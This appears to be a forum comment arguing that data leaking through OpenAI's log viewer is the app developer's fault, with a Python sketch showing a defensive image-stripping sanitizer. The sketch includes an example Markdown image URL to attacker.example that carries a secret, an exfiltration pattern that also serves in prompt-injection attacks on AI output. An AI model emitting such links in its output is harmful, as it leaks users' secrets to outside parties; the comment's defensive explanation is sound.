No, OpenAI doesn't claim to protect users from anything; this is a case of an application exfiltrating data to OpenAI, which can then end up leaking back out to the attacker. Preventing that isn't something that's up to OpenAI; it's up to the app developer.
It's the same as if your devs accidentally sent PII to Datadog - sure, Datadog could add some kind of filter to try to block it from being recorded, but it's not their fault that your devs or application sent them data. Same situation here: bad info is being sent to OpenAI, and OpenAI's otherwise benign log viewer is rendering markdown, which could load an external image that has the bad data in its URL.
In that same situation, you'd expect Datadog to just not automatically render Markdown, but you wouldn't blame them for accepting PII that your developers willingly sent to them. Same for OpenAI: they could tighten up the log console feature a bit, but it's ultimately up to the developers not to feed secrets to a third party.
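To make the mechanism concrete, here's a minimal sketch of both halves: a log entry where untrusted output smuggles data out through a Markdown image URL, and the kind of sanitization a log viewer could apply before rendering. The log text, the attacker domain, and the `strip_markdown_images` helper are all hypothetical illustrations, not anything from OpenAI's or Datadog's actual products.

```python
import re

# Hypothetical log entry: model output containing a Markdown image whose
# URL carries leaked data. If a viewer renders this, the browser fetches
# the URL and the attacker's server receives the secret.
log_entry = "Summary complete. ![ok](https://attacker.example/c?d=SECRET_VALUE)"

# Matches ![alt](url) image syntax in untrusted Markdown.
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\([^)]*\)")

def strip_markdown_images(text: str) -> str:
    """Replace Markdown image references so no external request is made."""
    return IMAGE_PATTERN.sub("[image removed]", text)

print(strip_markdown_images(log_entry))
# -> Summary complete. [image removed]
```

Stripping (or simply not rendering) images is the viewer-side fix; it doesn't change the fact that the secret was already sent to the third party in the first place.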